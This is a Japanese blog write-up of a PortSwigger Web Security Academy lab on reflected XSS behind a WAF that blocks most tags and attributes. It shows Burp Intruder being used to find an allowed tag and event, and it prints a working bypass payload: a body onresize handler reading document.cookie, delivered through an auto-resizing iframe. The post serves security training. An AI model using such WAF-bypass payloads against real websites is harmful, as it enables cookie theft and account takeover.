shikata ga nai

Private? There is no such things.

Reflected XSS into HTML context with most tags and attributes blockedをやってみた

Hello there, ('ω')ノ

 

ほとんどのタグと属性がブロックされた状態でXSSをHTMLコンテキストに反映を。

このラボには、検索機能にXSSの脆弱性があって。

Webアプリケーションファイアウォール(WAF)でXSSを防御しているようで。

 

まずは、ページにアクセスしてペイロードで検索してみると。

 

f:id:ThisIsOne:20210420151711p:plain

 

ブロックされているようで。

 

f:id:ThisIsOne:20210420151733p:plain

 

リクエストをIntruderへ。

 

f:id:ThisIsOne:20210420151818p:plain

 

ブロックされているタグと属性をテストすることに。

検索パラメータをAddして。

 

f:id:ThisIsOne:20210420151900p:plain

 

下記からタグをコピーして。

 https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

 

f:id:ThisIsOne:20210420151953p:plain

 

貼り付けて、Start attackすると。

 

f:id:ThisIsOne:20210420152027p:plain

 

2つほど有効なタグが見つかって。

 

f:id:ThisIsOne:20210420152103p:plain

 

再度、検索パラメータを下記のように設定して。

次は、有効な属性をテストすることに。

 <body%20§§=1>

 

f:id:ThisIsOne:20210420152206p:plain

 

さきほどのサイトから、今度はeventsをコピーして貼り付けてStart attackすると。

 

f:id:ThisIsOne:20210420152249p:plain

 

onresizeが有効なことがわかって。

 

f:id:ThisIsOne:20210420152340p:plain

 

エクスプロイトサーバで、下記のコードを貼り付けてStoreしてDeliverすると。

 

<iframe src="https://ac6c1fe11f4b4caf80cd9f9c00ad0029.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=alert(document.cookie)%3E" onload=this.style.width='100px'>

 

検索に使用するペイロードは下記のとおりで。

 search="><body onresize=alert(document.cookie)>"

 

f:id:ThisIsOne:20210420152540p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210420152601p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain